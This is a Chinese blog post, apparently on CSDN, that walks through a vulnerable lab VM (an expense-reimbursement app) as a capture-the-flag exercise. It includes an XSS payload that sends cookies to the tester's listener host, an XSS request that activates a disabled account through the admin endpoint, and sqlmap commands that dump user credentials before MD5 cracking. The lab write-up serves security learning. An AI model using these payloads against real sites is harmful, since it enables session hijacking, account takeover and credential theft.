一次简单的xss靶机渗透过程记录

最新推荐文章于 2024-07-17 11:29:00 发布
最新推荐文章于 2024-07-17 11:29:00 发布
阅读量997 收藏 30
点赞数 29
分类专栏: 打靶日记 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63295508/article/details/140084283
版权

前言

简单记录一次打靶的过程,这里我们作为Samuel Lamotte需要进入公司网站寻找并利用漏洞索要报销,目前已知了登录密码为fzghn4lw。

渗透过程

一、信息收集

1、确定目标IP地址

2、nmap收集端口号

端口扫描发现了对方服务器开放了许多端口。

3、目录扫描

这里扫出来许多目录,接下来依次访问寻找有用信息。

二、漏洞探测

访问80端口,发现存在登录和注册的入口。

admin目录可以成功访问,这里存放着已有的所有账户,看status那一列,发现slamotte是处于不可以登录的状态。

访问注册页面,结合刚才在admin.php页面看到的信息,猜测这里可能存在xss漏洞。先注册一个账户测试,结果发现信息提交不了,检查查看源码发现提交按钮这里设置了disable,直接删除后就能成功注册了。

三、漏洞利用

1、获取cookie

①kali开启临时http服务

python3 -m http.server

②写入js代码触发XSS,让kali能监听并获取到管理员登录的cookie

<script>document.write('<img src="http://192.168.253.129:8000/?'+document.cookie+'">')</script>

PS:这里注意192.168.253.129:8000是kali的ip和端口号。

这里我们能监听到众多cookie,接下来需要找到管理员的cookie进行利用。

2、利用cookie

激活slamotte账户时,抓包并将 cookie 替换为监听到的管理员 cookie。

放包运行后发现页面出现了错误提示,告诉我们管理员账号同时只能登录一次。

为了避免这种情况,创建另⼀个帐户,修改XSS 语句去激活 “Samuel Lamotte” 的帐户 。通过bp抓的激活账号时候的数据包中看到,是通过如下语句实现激活动作的:

GET /admin/admin.php?id=11&status=active

Host: 192.168.253.143

因此构造的恶意语句可以将 “/admin/admin.php?id=11&status=active” 插入进去:

<script>document.write('<img src="http://192.168.253.143/admin/admin.php?id=11&status=active">')</script>

让后台脚本⾃动访问该⻚⾯时,由管理员自己激活那个账号。

点击那个激活按钮后看到提交参数 id=11&status=active

此时访问admin.php页面,我们发现Samuel Lamotte成功激活。

成功激活了Samuel Lamotte的帐户后,我们使⽤已知的身份凭证:slamotte/fzghn4lw 登录到网站并提交报销申请。

浏览其中的内容,继续寻找可利用的漏洞。在home页面发现了留言框,推测可能存在xss漏洞,对其进行测试后,发现确实存在xss漏洞。那么接下来就可以在此留言框中写入恶意代码,尝试获取管理员的cookie信息。

注意kali需要开启监听才能获取到cookie信息,可能会获取到多个cookie值,因此需要我们对这些cookie值进行测试,直到确定最终管理员的cookie信息是哪一个。

将获取到的cookie信息记录下来,利用插件替换cookie值,寻找管理员的cookie值,利用manager的身份登录后台将刚才Samuel Lamotte提交的报销申请通过。

成功利用manager的身份通过了报销单,然而并没有完全结束,因为报销单还需要财务人员进行审批。

3、sql注入

在信息收集和漏洞探测的阶段,发现 site.php 界面存在sql注入漏洞,接下来可以利用这个漏洞爆破出所有用户及其密码。

利用sqlmap的 -r 参数:

把当前存在sql注⼊的⻚⾯⽤bp抓包后,将其内容保存到sql.txt文件中,然后利用sqlmap工具,使用 -r 参数进行sql注入。

命令:sqlmap -r sql.txt --current-db
注意:执行命令前需先进入sql.txt文件存在的目录

#进入包含cookie值的文件目录
 cd /root/Desktop

#寻找sql注入
 sqlmap -r sql.txt --current-db

#查库
 sqlmap -r sql.txt --current-db --dbs

#查表
 sqlmap -r sql.txt --current-db -D myexpense --tables

#查列
 sqlmap -r sql.txt --current-db -D myexpense -T user --columns 

#查字段
 sqlmap -r sql.txt --current-db -D myexpense -T user -C username,password --dump

成功爆出所有账密后,找到财务⼈员afoulon和pbaudouin,尝试获取他们的密码。密码有做加密处理,观察其特征,应该为MD5加密,利用工具解密,成功破解pbaudouin的密码为HackMe。

四、获得flag

使用pbaudouin/HackMe登录,审批Samuel Lamotte提交的报销申请。

审批成功后,再次登录Samuel Lamotte的账号,此时flag就会直接显示在页面上了,成功获得flag。

 

魔法少女贺天
关注
  • 29
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
记录一次Linux靶机渗透思路
2401_85025476的博客
06-19 703
实战过程中,小星通过url参数,发挥fuzz思路,对各个漏洞进行尝试,并利用功能点进行测试。过程涉及到利用水平越权致使用户信息泄露、使用F12审查元素和Hydra工具、Sudo滥用之php命令提权等实战中常用的相关知识点。
DC-5靶机渗透测试详细教程
啊醒的博客
05-04 6871
DC-5靶机渗透测试详细教程
Vulnhub靶机:DC-1渗透详细过程
菜鸟学渗透
04-01 717
Vulnhub靶机:DC-1渗透详细过程
dc-5靶机渗透记录
wlllllianqing的博客
11-13 5576
dc-5靶机渗透记录 实验环境 靶机:DC-5靶机(192.168.126.137) 攻击机:kali Linux(192.168.126.129) 信息收集 ip:192.168.126.137 开放的端口: 80/tcp open http nginx 1.6.2 111/tcp open rpcbind 2-4 (RPC #100000) 运行: Linux 3.X|4.X 操作系统CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_
Matrix Breakout:2 Morpheus(靶机详细渗透测试过程记录
m0_63028223的博客
07-12 624
php伪协议读文件,msf提权
记录一次vuln靶场的渗透过程---Momentum-1
bobo_milk的博客
05-09 445
文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 提示:以下是本篇文章正文内容,下面案例可供参考 一、主机发现 首先按照惯例,利用nmap进行主机发现,顺便将开放端口也扫描出来。扫描自己所在的网段。 nmap 192.168.216.0/24 可以看到IP地址和开放了22和80端口,接下来对服务器信息进行详细的扫描 nmap -A -v -T4 19.
靶机渗透测试实战(二)——Lazysysadmin渗透实战
橘子女侠
05-09 4467
目录 一. 实验环境 二. 实验步骤 (1)信息收集——主机发现 (2)信息收集——端口扫描 (3)渗透测试 139,445端口(共享服务) 80端口(Apache服务——http) 22端口(SSH服务) 三. 实验总结 一. 实验环境 靶机:Lazsysadmin,IP地址:暂时未知; 测试机:Kali,IP地址:192.168.37.131; 测试机:物理机w...
渗透测试-靶机打靶思路与方法
lza20001103的博客
08-18 4192
渗透测试-靶机打靶思路与方法 文章目录渗透测试-靶机打靶思路与方法一.对靶机进行信息收集1.首先对目标存活靶机发起嗅探:2.对目标主机开放端口及服务发起探测3.对非web端口的服务发起迅速的嗅探,尝试使用nday进行攻击4.开始进行web端口外部打点尝试二.一些靶机打点的工具和知识三.进行linux下的提权四.总结 一.对靶机进行信息收集 1.首先对目标存活靶机发起嗅探: ①sudo arp-scan -l 针对网卡发起扫描存活主机 ②arping扫描:for i in (seq 1 254);do arp
Vulnhub 靶机渗透:SICKOS: 1.2
Mysmycbx的博客
06-07 1069
使用curl -X OPTIONS查看网站能够使用哪些请求方式,然后使用PUT进行上传恶意文件,例如一句话木马,反弹shell等。反弹shell时,尝试多个shell,bash,pyhton等。定时任务不止一个路径,/etc/crontab, 还有/etc/cron* ,包含/etc/cron.d,/etc/cron.daily等。定时任务里发现应用,一定要搜相关漏洞,搜到后综合多个poc进行利用。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8339
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【网络安全】资产记录工具 Hacker Asset Logger 安装使用详细教程
等风来
07-15 178
在对某一应用程序的多个页面、对多个相关联的应用程序进行渗透测试的过程中,多个请求包的参数、功能之间可能存在一定的联系。例如,在A页面触发的请求包中,通过UID可获取CustomerID;在B页面触发的请求包中,CustomerID用于Cookie身份鉴定、获取用户敏感信息、获取用户订单号OrderNo;在C页面触发的请求包中,OrderNo用于获取对应用户的敏感信息,如姓名、电话、地址、身份证。
网络安全-网络安全及其防护措施8
最新发布
LS_Ai的博客
07-17 1070
数据中心网络架构是指数据中心内部网络的设计和结构,其目的是提供高性能、高可用性和高扩展性的网络连接。合理的数据中心网络架构能够支持大规模数据处理和传输,满足数据中心的业务需求,提高整体运营效率。负载均衡是一种分配网络流量和计算任务的方法,旨在优化资源利用率、提高系统性能和增强服务可用性。通过将请求分配到多个服务器上,负载均衡避免了单点故障和性能瓶颈,确保系统稳定和高效运行。网络安全策略是指为保护网络和信息系统的安全而制定的一系列规则和措施。
网络安全-网络安全及其防护措施1
LS_Ai的博客
07-14 1028
网络安全是指保护网络系统及其数据免受未经授权的访问、使用、修改或破坏的过程。它包括对硬件、软件、数据和通信的全面保护,确保系统的机密性、完整性和可用性。网络安全涉及一系列的策略、技术和流程,用于保护网络和数据免受攻击、损失或未经授权的访问。机密性:确保信息只被授权人员访问和查看。完整性:保证信息的准确和完整,防止未经授权的修改。可用性:确保系统和数据在需要时可被合法用户访问。
Zico2靶机渗透测试实战指南
为了开始这个渗透实战,我们需要准备一个测试机(如Kali Linux 2020.4)和Zico2靶机,两者都应设置为NAT模式并确保它们与宿主机(如Windows 10)在同一网络段内。Zico2虚拟机的下载链接和提取码也在摘要中给出。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值